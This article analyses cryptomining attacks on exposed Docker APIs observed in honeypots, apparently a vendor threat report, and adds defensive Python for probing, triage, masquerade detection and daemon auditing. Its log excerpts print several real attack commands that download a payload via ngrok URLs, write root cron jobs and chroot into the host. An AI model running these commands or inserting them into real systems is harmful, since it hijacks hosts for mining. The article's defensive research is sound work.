How exposed Docker APIs and public community images are used to deploy cryptocurrency miners


We analysed the data collected by the honeypot containers we built to track threats, and saw significant activity from unwanted or unauthorised cryptocurrency miners deployed as rogue containers using a community-published image on Docker Hub. The image is used as part of a service that delivers malicious cryptocurrency miners.

In addition, network tooling is deployed to pivot into neighbouring exposed containers and applications.

We leave our honeypots as they are, that is, with default settings, without hardening measures or additional software. Note that Docker publishes initial-setup recommendations that avoid simple errors and weaknesses. But the honeypots used here are containers designed to observe attacks aimed at the containerisation platform itself, not at the applications inside the containers.

The malicious activity observed is also notable because it requires no vulnerability and is independent of the Docker version. Finding a misconfigured, and therefore exposed, Docker API is all attackers need to infect many exposed servers.

An exposed Docker API lets a user perform a wide range of operations, including listing running containers, fetching logs from a given container, starting and stopping containers (including forced stops), and even creating a new container from a given image with whatever settings the caller specifies.
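The check a practitioner wants at this point is whether a given host answers Docker API calls without any authentication. The following is an added example, not code from the original post: it sends GET /version to the conventional plaintext port and classifies the answer. The target host and port are assumptions; a TLS-only daemon on 2376 answers a plaintext request with HTTP 400 "Client sent an HTTP request to an HTTPS server", which is the healthy case.

```python
"""Added example: probe a host for an unauthenticated Docker Engine API.
Not code from the original post; host and port are assumptions."""
import http.client
import json


def classify_docker_response(status, body):
    """Classify an HTTP reply to GET /version on a Docker API port.

    200 with a JSON body carrying ApiVersion means the daemon answered an
    unauthenticated request: anyone who can reach the port can create and
    start containers. A Go HTTP server behind TLS answers a plaintext
    request with 400 "Client sent an HTTP request to an HTTPS server".
    """
    if status == 200:
        try:
            info = json.loads(body)
        except ValueError:
            return "unknown"
        if isinstance(info, dict) and "ApiVersion" in info:
            return "exposed-unauthenticated"
        return "unknown"
    if status == 400 and b"HTTPS server" in body:
        return "tls-required"
    if status in (401, 403):
        return "auth-required"
    return "unknown"


def probe_docker_api(host, port=2375, timeout=5.0):
    """Send the probe and return (verdict, raw body). Needs network access."""
    try:
        conn = http.client.HTTPConnection(host, port, timeout=timeout)
        conn.request("GET", "/version")
        resp = conn.getresponse()
        body = resp.read()
        conn.close()
    except (OSError, http.client.HTTPException):
        return "unreachable", b""
    return classify_docker_response(resp.status, body), body


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"  # assumed target
    verdict, raw = probe_docker_api(target)
    print(target, verdict, raw[:80])
```

Run it only against hosts you own or are authorised to test; a verdict of exposed-unauthenticated means the daemon will also accept the container-create and start calls described above.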

Left: the malware delivery method. Right: the attacker's environment, which allows images to be pulled remotely.

Geographic distribution of 3,762 exposed Docker APIs. Based on a Shodan search from 12.02.2019.

Attack chain and payload options

Malicious activity was observed not only through the honeypots. Shodan data shows that the number of exposed Docker APIs (see the second chart) has grown since we investigated a misconfigured container used as a bridge to deploy Monero cryptocurrency-mining software. In October of last year (2018; current data looks roughly like this. Translator's note) there were only 856 exposed APIs.

Analysis of the honeypot logs showed that use of the container image was paired with use of ngrok, a tool for creating secure tunnels or forwarding traffic from publicly reachable endpoints to specific addresses or resources (for example, localhost). This lets attackers generate URLs dynamically when delivering the payload to an exposed server. Below are code samples from the logs showing abuse of the ngrok service:

Tty: false,
Command: "-c curl --retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d "hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283";echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d" >/tmp9bedce/etc/crontab;echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d" >/tmp9bedce/etc/cron.d/1m;chroot /tmp9bedce sh -c "cron || crond"",
Entrypoint: "/bin/sh"

Tty: false,
Command: "-c curl --retry 3 -m 60 -o /tmp570547/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d "hxxp://5249d5f6[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283";echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d" >/tmp570547/etc/crontab;echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d" >/tmp570547/etc/cron.d/1m;chroot /tmp570547 sh -c "cron || crond"",
Entrypoint: "/bin/sh"

Tty: false,
Command: "-c curl --retry 3 -m 60 -o /tmp326c80/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed "hxxp://b27562c1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee";echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed" >/tmp326c80/etc/crontab;echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed" >/tmp326c80/etc/cron.d/1m;chroot /tmp326c80 sh -c "cron || crond"",
Entrypoint: "/bin/sh",

Tty: false,
Cmd: "-c curl --retry 3 -m 60 -o /tmp8b9b5b/tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed "hxxp://f30c8cf9[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d9aa8e1b9ec086e4ee";echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed" >/tmp8b9b5b/etc/crontab;echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d9aa8e1b9ec086e4eed" >/tmp8b9b5b/etc/cron.d/1m;chroot /tmp8b9b5b sh -c "cron || crond"",
Entrypoint: "/bin/sh"
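The log entries above share one shape: download a payload through an ngrok tunnel, write root crontab entries under a directory such as /tmp9bedce, then chroot into that directory and start cron. That only has an effect if the host's root filesystem is bind-mounted at that path, which the logs do not show but which is the natural reading. The following added example, not code from the original post, triages a container-create request of this kind. The sample request is constructed from the first log entry; the image name and the "/:/tmp9bedce" bind mount are assumptions.

```python
"""Added example: triage a Docker API container-create request modelled on
the honeypot log entries. Not code from the original post; the sample
request is constructed and its host-root bind mount is an assumption."""
import re

# Constructed sample, modelled on the first log entry (image name assumed).
SAMPLE_CREATE_REQUEST = {
    "Image": "example/alpine-curl",
    "Tty": False,
    "Entrypoint": ["/bin/sh"],
    "Cmd": [
        "-c",
        'curl --retry 3 -m 60 -o /tmp9bedce/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d '
        '"hxxp://12f414f1[.]ngrok[.]io/f/serve?l=d&r=ce427fe0eb0426d997cb0455f9fbd283";'
        'echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d" >/tmp9bedce/etc/crontab;'
        'echo "* * * * * root sh /tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d" >/tmp9bedce/etc/cron.d/1m;'
        'chroot /tmp9bedce sh -c "cron || crond"',
    ],
    "HostConfig": {"Binds": ["/:/tmp9bedce"]},  # assumed: host root mounted in the container
}

# Matches live and defanged ngrok tunnel hosts (8 hex chars before ngrok.io).
NGROK_RE = re.compile(r"h(?:xx|tt)ps?://[0-9a-f]{8}(?:\.|\[\.\])ngrok(?:\.|\[\.\])io", re.I)
DOWNLOAD_RE = re.compile(r"\b(?:curl|wget)\b")


def _as_text(value):
    """Cmd/Entrypoint may be a string or a list of arguments in the API."""
    if value is None:
        return ""
    if isinstance(value, str):
        return value
    return " ".join(value)


def triage_create_request(req):
    """Return (findings, ngrok_urls) describing why the request is suspicious."""
    findings = []
    script = _as_text(req.get("Entrypoint")) + " " + _as_text(req.get("Cmd"))
    host_config = req.get("HostConfig") or {}
    # Binds are "host_path:container_path[:options]"; a host path of "/" is the whole host.
    root_mounts = []
    for bind in host_config.get("Binds") or []:
        parts = bind.split(":")
        if len(parts) >= 2 and parts[0] == "/":
            root_mounts.append(parts[1])
    if root_mounts:
        findings.append("host-root-bind-mount")
    for mnt in root_mounts:
        # chroot into the mounted host root = commands run against the host, not the container
        if re.search(r"\bchroot\s+" + re.escape(mnt) + r"\b", script):
            findings.append("chroot-into-host")
        # writing the host's crontab through the mount = persistence that survives the container
        if re.search(re.escape(mnt) + r"/etc/(?:crontab|cron\.d/)", script):
            findings.append("host-cron-persistence")
    if host_config.get("Privileged"):
        findings.append("privileged")
    urls = NGROK_RE.findall(script)
    if urls:
        findings.append("ngrok-tunnel-download")
    elif DOWNLOAD_RE.search(script):
        findings.append("remote-download")
    return findings, urls
```

The same logic can be run over `docker events` output or over the request bodies of an API gateway in front of the daemon; any request that combines a host-root bind with chroot or a cron write is worth blocking outright, whatever image it names.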

As you can see, the dropped files are fetched from constantly changing URLs. These URLs have a short lifetime, so the payloads cannot be downloaded once they expire.

There are two payload options. The first is a compiled ELF miner for Linux (detected as Coinminer.SH.MALXMR.ATNO) that connects to a mining pool. The second is a script (TrojanSpy.SH.ZNETMAP.A) designed to fetch a set of network tools used to scan network ranges and then hunt for new victims.

The dropper script sets two variables that are then used to deploy the cryptocurrency miner. The HOST variable holds the URL where the malicious files are hosted, and the RIP variable holds the file name (in fact, a hash) of the miner to deploy. The HOST variable changes whenever the hash variable changes. The script also tries to check that no other cryptocurrency miners are running on the compromised server.

Examples of HOST and RIP values, together with the code snippet used to check that no miners are already running.

Before launching the miner, the script renames it to nginx. Other versions of this script rename the miner after other legitimate services that may be present in Linux environments. This is usually enough to pass checks that only compare against a list of running process names.
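Because the miner borrows a legitimate name, a process list by name is not a useful check. The following added example, not code from the original post, compares each process's name against where its binary actually lives, which a renamed binary in /tmp cannot fake. The list of service names and the /proc snapshot used for the demonstration are constructed.

```python
"""Added example: spot processes that borrow a legitimate service name.
Not code from the original post; the service-name list and the sample
/proc snapshot are constructed."""
import os

SERVICE_NAMES = {"nginx", "sshd", "cron", "crond", "httpd"}  # assumed list, extend as needed
SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")


def read_proc_snapshot():
    """Collect (pid, comm, exe) for every process on a live Linux host."""
    snapshot = []
    for entry in os.listdir("/proc"):
        if not entry.isdigit():
            continue
        try:
            with open(f"/proc/{entry}/comm") as fh:
                comm = fh.read().strip()
            exe = os.readlink(f"/proc/{entry}/exe")  # needs root for other users' processes
        except OSError:
            continue  # process exited or is not ours to inspect
        snapshot.append({"pid": int(entry), "comm": comm, "exe": exe})
    return snapshot


def find_masquerading(snapshot, service_names=SERVICE_NAMES):
    """Flag processes whose name says 'service' but whose binary does not."""
    suspicious = []
    for proc in snapshot:
        comm, exe = proc["comm"], proc["exe"]
        if comm not in service_names:
            continue
        reasons = []
        if exe.startswith(SCRATCH_DIRS):
            reasons.append("binary in scratch directory")
        if exe.endswith(" (deleted)"):
            reasons.append("binary unlinked after start")
        if os.path.basename(exe.replace(" (deleted)", "")) != comm:
            reasons.append("name does not match binary")
        if reasons:
            suspicious.append((proc["pid"], comm, exe, reasons))
    return suspicious


# Constructed snapshot: a real nginx master/worker pair and a renamed miner run from /tmp.
SAMPLE_SNAPSHOT = [
    {"pid": 812, "comm": "nginx", "exe": "/usr/sbin/nginx"},
    {"pid": 813, "comm": "nginx", "exe": "/usr/sbin/nginx"},
    {"pid": 4711, "comm": "nginx", "exe": "/tmp/tmpfilece427fe0eb0426d997cb0455f9fbd283d"},
    {"pid": 4720, "comm": "crond", "exe": "/usr/sbin/crond"},
]

if __name__ == "__main__":
    for pid, name, path, why in find_masquerading(read_proc_snapshot()):
        print(pid, name, path, "; ".join(why))
```

Pair this with a CPU-time check: a process named nginx that is the top CPU consumer on a box with no web traffic is the miner, whatever it is called.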

The scanning script has its own features. It uses the same URL service to fetch the tools it needs. Among them is the zmap binary, used to scan networks and obtain a list of open ports. The script also fetches another binary used to interact with the discovered services and grab their banners, to learn more about each service found (for example, its version).

The script also predefines some network ranges to scan, although this depends on the script version. It also sets the target ports for the services of interest, in this case Docker, before running the scan.

Once potential victims are found, their banners are grabbed. The script then filters the targets by the services, applications, components or platforms of interest: Redis, Jenkins, Drupal, MODX, Kubernetes Master, Docker 1.16 client and Apache CouchDB. If a scanned server matches one of these, it is saved to a text file that the attackers can use later for further analysis and exploitation. These text files are uploaded to the attackers' servers via dynamic links, that is, a separate URL is used for each file, which makes subsequent access difficult.

The attack vector is the Docker image, as the next two code fragments show.

Top: renaming the miner after a legitimate service. Bottom: how zmap is used to scan the network.

Top: the predefined network ranges. Bottom: the specific ports scanned for services, including Docker.

The screenshot shows that the alpine-curl image has been pulled more than 10 million times.

A Docker image can be built on Alpine Linux and curl, a lightweight CLI tool for transferring files over various protocols. As the previous screenshot shows, this image has been pulled more than 10 million times. The high download count may indicate that this image is used as an entry point: it was last updated more than six months ago, and users have not pulled other images from this repository nearly as often. In Docker, the entrypoint is the list of commands used to configure a container for running. If the container is misconfigured (for example, left exposed to the Internet), the image can serve as an attack vector. Attackers can use it to deliver a payload whenever they find a misconfigured or exposed container.

It is important to note that this image (alpine-curl) is not malicious in itself, but as shown above it can be used to carry out malicious actions. Similar Docker images can also be used for malicious actions. We contacted Docker and worked with them on this issue.

Recommendations

Misconfiguration remains a persistent problem for many companies, especially those adopting DevOps with its focus on fast development and delivery. This is compounded by the need to comply with audit and monitoring requirements, the need to watch over data privacy, and the heavy penalties for non-compliance. Integrating security automation into the development lifecycle not only helps find security holes that might otherwise go unnoticed, but also cuts unnecessary work, such as running extra software builds for every vulnerability or misconfiguration discovered after the application has been deployed.

The incident discussed in this article highlights the need to consider security from the start, including the following recommendations:

  • For system administrators and developers: always check your API settings to make sure everything is configured to accept requests only from a specific server or the internal network.
  • Follow the principle of least privilege: make sure container images are signed and verified, restrict access to critical components (the container daemon service) and add encryption to network connections.
  • Follow the recommendations and enable the security mechanisms, for example those from Docker and the built-in security features.
  • Use automated runtime and image scanning to learn more about the processes running inside the container (for example, to detect tampering or search for vulnerabilities). Application control and integrity monitoring help track unusual changes to servers, files and system areas.
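The first two recommendations come down to one setting on the daemon: if the control API listens on TCP at all, it must require client certificates. The following added example, not code from the original post, audits the text of /etc/docker/daemon.json and shows the weak configuration beside the hardened one; both configurations and the certificate paths are constructed.

```python
"""Added example: audit /etc/docker/daemon.json for an exposed control API.
Not code from the original post; both configurations are constructed."""
import json

# Weak: plaintext TCP listener on every interface, no client authentication.
WEAK_DAEMON_JSON = """
{
  "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]
}
"""

# Hardened: TLS listener bound to a management address, client certs required.
# Certificate paths are assumptions.
HARDENED_DAEMON_JSON = """
{
  "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],
  "tlsverify": true,
  "tlscacert": "/etc/docker/ca.pem",
  "tlscert": "/etc/docker/server-cert.pem",
  "tlskey": "/etc/docker/server-key.pem"
}
"""

TLS_KEYS = ("tlscacert", "tlscert", "tlskey")


def audit_daemon_config(text):
    """Return a list of (severity, message) for the given daemon.json text."""
    cfg = json.loads(text)
    issues = []
    tcp_hosts = [h for h in cfg.get("hosts", []) if h.startswith("tcp://")]
    if not tcp_hosts:
        return issues  # only the local Unix socket: nothing reachable over the network
    if not cfg.get("tlsverify"):
        issues.append(("critical", "tcp listener without tlsverify: unauthenticated remote root"))
    else:
        missing = [k for k in TLS_KEYS if k not in cfg]
        if missing:
            issues.append(("high", "tlsverify set but missing " + ", ".join(missing)))
    for host in tcp_hosts:
        addr = host[len("tcp://"):]
        if addr.startswith(("0.0.0.0", "[::]", ":")):
            issues.append(("medium", f"{host} listens on all interfaces; bind to a management address"))
        if addr.endswith(":2375"):
            issues.append(("info", f"{host} uses the conventional plaintext port 2375"))
    return issues


if __name__ == "__main__":
    for label, text in (("weak", WEAK_DAEMON_JSON), ("hardened", HARDENED_DAEMON_JSON)):
        print(label, audit_daemon_config(text) or "ok")
```

Two caveats: a client certificate signed by that CA is equivalent to root on the host, so guard the key like an SSH key; and if the distribution's systemd unit already passes `-H fd://` to dockerd, setting `hosts` in daemon.json conflicts with it and the daemon refuses to start, so move the listener setting into one place.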

Trend Micro helps DevOps teams build securely, ship fast and launch anywhere. Trend Micro Hybrid Cloud Security delivers powerful, streamlined and automated security across the organisation's DevOps pipeline and provides multiple XGen threat-defence techniques to protect physical, virtual and cloud workloads at runtime. It also adds container security with Deep Security and Deep Security Smart Check, which scan Docker container images for malware and vulnerabilities at any point in the development pipeline to stop threats before they are deployed.

Indicators of compromise

Related hashes:

  • 54343fd1555e1f72c2c1d30369013fb40372a88875930c71b8c3a23bbe5bb15e (Coinminer.SH.MALXMR.ATNO)
  • f1e53879e992771db6045b94b3f73d11396fbe7b3394103718435982a7161228 (TrojanSpy.SH.ZNETMAP.A)

Our self-paced Docker video course shows which settings to make in advance to reduce the likelihood of, or completely avoid, the situation described above. And on 19-21 August, at the intensive online DevOps Tools & Cheats, you can discuss these and similar security problems with colleagues and practising instructors at a round table, where everyone can speak and listen to the pains and successes of experienced peers.

Source: www.habr.com
